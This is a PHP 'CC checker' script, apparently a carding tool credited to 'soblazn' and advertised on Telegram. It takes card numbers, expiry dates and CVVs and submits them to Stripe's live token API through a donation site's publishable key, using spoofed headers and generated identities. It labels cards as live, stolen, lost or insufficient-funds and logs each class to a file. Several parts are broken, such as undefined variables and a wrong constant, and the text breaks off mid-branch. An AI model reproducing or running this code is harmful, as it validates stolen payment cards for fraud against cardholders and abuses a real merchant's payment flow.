<?php


/// Made by Checker By ♛ soblazn ♛
/// Join @Monster_Checker for more...
/// All the things are done.. :)
/// Now just use VPN and Enjoy :)
/// HMA is recommended


error_reporting(0);
set_time_limit(0);
error_reporting(0);
date_default_timezone_set('America/Buenos_Aires');


function multiexplode($delimiters, $string)
{
  $one = str_replace($delimiters, $delimiters[0], $string);
  $two = explode($delimiters[0], $one);
  return $two;
}
$lista = $_GET['lista'];
$cc = multiexplode(array(":", "|", ""), $lista)[0];
$mon = multiexplode(array(":", "|", ""), $lista)[1];
$year = multiexplode(array(":", "|", ""), $lista)[2];
$cvv = multiexplode(array(":", "|", ""), $lista)[3];

function GetStr($string, $start, $end)
{
  $str = explode($start, $string);
  $str = explode($end, $str[1]);
  return $str[0];
}
function saveCCN($cc) {
    $file = dirname(FILE) . "/CCN Lives.txt";
    $fp = fopen($file, "a+");
    fwrite($fp, $cc . PHP_EOL);
    fclose($fp);
}
function saveLive($cc) {
    $file = dirname(FILE) . "/Live Cards.txt";
    $fp = fopen($file, "a+");
    fwrite($fp, $cc . PHP_EOL);
    fclose($fp);
}
function saveCVV($cc) {
    $file = dirname(FILE) . "/CVV Lives.txt";
    $fp = fopen($file, "a+");
    fwrite($fp, $cc . PHP_EOL);
    fclose($fp);
}
function saveStolenLives($cc) {
    $file = dirname(FILE) . "/Stolen Cards.txt";
    $fp = fopen($file, "a+");
    fwrite($fp, $cc . PHP_EOL);
    fclose($fp);
}
function savePickupLives($cc) {
    $file = dirname(FILE) . "/Pickup Cards.txt";
    $fp = fopen($file, "a+");
    fwrite($fp, $cc . PHP_EOL);
    fclose($fp);
}
function saveLostLives($cc) {
    $file = dirname(FILE) . "/Lost Cards.txt";
    $fp = fopen($file, "a+");
    fwrite($fp, $cc . PHP_EOL);
    fclose($fp);
}
function saveZipLives($cc) {
    $file = dirname(FILE) . "/Incorrect Zip Cards.txt";
    $fp = fopen($file, "a+");
    fwrite($fp, $cc . PHP_EOL);
    fclose($fp);
}
    function saveInsufficientLives($cc) {
    $file = dirname(FILE) . "/Insufficient Fund Cards.txt";
    $fp = fopen($file, "a+");
    fwrite($fp, $cc . PHP_EOL);
    fclose($fp);
}
function RandomString($length = 23) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString;
}
function emailGenerate($length = 10) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString.'@olxbg.cf';
}
$gen_email = urlencode(emailGenerate());
////////////////////////////===[Randomizing Details Api]

$get = file_get_contents('https://randomuser.me/api/1.2/?nat=us');
preg_match_all("(\"first\":\"(.*)\")siU", $get, $matches1);
$name = $matches1[1][0];
preg_match_all("(\"last\":\"(.*)\")siU", $get, $matches1);
$last = $matches1[1][0];
preg_match_all("(\"email\":\"(.*)\")siU", $get, $matches1);
$email = $matches1[1][0];
preg_match_all("(\"street\":\"(.*)\")siU", $get, $matches1);
$street = $matches1[1][0];
preg_match_all("(\"city\":\"(.*)\")siU", $get, $matches1);
$city = $matches1[1][0];
preg_match_all("(\"state\":\"(.*)\")siU", $get, $matches1);
$state = $matches1[1][0];
preg_match_all("(\"phone\":\"(.*)\")siU", $get, $matches1);
$phone = $matches1[1][0];
preg_match_all("(\"postcode\":(.*),\")siU", $get, $matches1);
$zip = $matches1[1][0];
preg_match_all("(\"country\":(.*),\")siU", $get, $matches1);
$country = $matches1[1][0];
/////////////////////////////////////BIN LOOKUP START////////////////////////////////////////////////////////////////
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Host: lookup.binlist.net',
'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'
));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, '');
$fim = curl_exec($ch);

$bank = getStr($fim, '"bank":{"name":"', '"');
$name = getStr($fim, '"name":"', '"');
$brand = getStr($fim, '"brand":"', '"');
$country = getStr($fim, '"country":{"name":"', '"');
$scheme = getStr($fim, '"scheme":"', '"');
$currency = getStr($fim, '"currency":"', '"');
$emoji = getStr($fim, '"emoji":"', '"');
$type = getStr($fim, '"type":"', '"');

 if(strpos($fim, '"type":"credit"') !== false) {
  $bin = 'Credit';
} else {
  $bin = 'Debit';
}
/////////////////////////////////////BIN LOOKUP END////////////////////////////////////////////////////////////////

//---------------------------------------------------------------------------------------------------------------------------------------------//

////////////////////////////////////===[For Authorizing Cards]////////////////////////////////////////////////////
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://api.stripe.com/v1/tokens');
curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(

'Host:  api.stripe.com',
'accept: application/json',
'accept-encoding: gzip, deflate, br',
'accept-language: en-GB',
'content-type: application/x-www-form-urlencoded',
'origin: https://checkout.stripe.com',
'referer: https://checkout.stripe.com/m/v3/index-933c5ec6e698f8e8c478639778699b64.html?distinct_id=1d316f89-d837-545f-c3f1-75be0fb8ab25',
'sec-fetch-dest: empty',
'sec-fetch-mode: cors',
'sec-fetch-site: same-site'));
//'user-agent: #'));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
//=============================================================================================================================================//
//=============================================================================================================================================//
curl_setopt($ch, CURLOPT_POSTFIELDS, 'email='.$gen_email.'&validation_type=card&payment_user_agent=Stripe+Checkout+v3+checkout-manhattan+(stripe.js%2Fa44017d)&referrer=https%3A%2F%2Fopenstates.org%2Fdonate%2F&card[number]='.$cc.'&card[exp_month]='.$mes.'&card[exp_year]='.$ano.'&card[cvc]='.$cvv.'&card[name]='.$gen_email.'&card[address_zip]='.$zip.'&time_on_page=79059&guid=4e42d4e8-3da7-4942-8089-3281b6bbc3d0&muid=0ae4cd03-dcfc-4d3c-a7df-cffcbf8d2edf&sid=de51c524-cde3-4e67-bf5d-fa92a2966ff0&key=pk_live_FfxSebrzvmYUbqqXdnhL7bNF');
//=============================================================================================================================================//
//=============================================================================================================================================//
$result = curl_exec($ch);
$token = trim(strip_tags(getStr($result,'"id": "','"')));
$info = curl_getinfo($ch);
$time = $info['total_time'];


////////////////////////////===[Card Response Start]///////////////////////////////////////////////////

if(strpos($result, '/donations/thank_you?donation_number=','' )) {saveCVV ("Live CVV -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CVV</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Donation is succeeded </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, '"cvc_check": "pass"')){saveCVV ("Live CVV -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CVV</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = CVC Check Pass </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛  </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "Thank You For Donation." )) {saveCVV ("Live CVV -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CVV</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Donation is succeeded </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛  </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "Thank You." )) {saveCVV ("Live CVV -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CVV</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Donation is succeeded </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛  </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result,'"status": "succeeded"')){saveCVV ("Live CVV -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CVV</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Succeeded </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card zip code is incorrect.' )) {saveZipLives ("Live CVV -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CVV</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Your card zip code is incorrect </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_zip" )) {saveZipLives ("Live CVV -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CVV</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Incorrect Zip </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "Your payment has already been processed")) {saveCVV ("Live CVV -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
  echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CVV</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Your payment has already been processed </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result,"The zip code you supplied failed validation.")){saveZipLives ("Live CVV -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CVV</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = The zip code you supplied failed validation </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "Success" )) {saveCVV ("Live CVV -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CVV</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Success </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "succeeded." )) {saveCVV ("Live CVV -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CVV</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Succeeded </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result,'"type":"one-time"')){saveCVV ("Live Card -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CVV</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = One Time </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card has insufficient funds.')) {saveInsufficientLives ("Live Card (Insufficient Card) -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live Card</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Insufficient Funds </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "insufficient_funds")) {saveInsufficientLives ("Live Card (Insufficient Card) -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live Card</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Insufficient Funds </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "lost_card" )) {saveLostLives ("Live CCN (Lost Card) -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
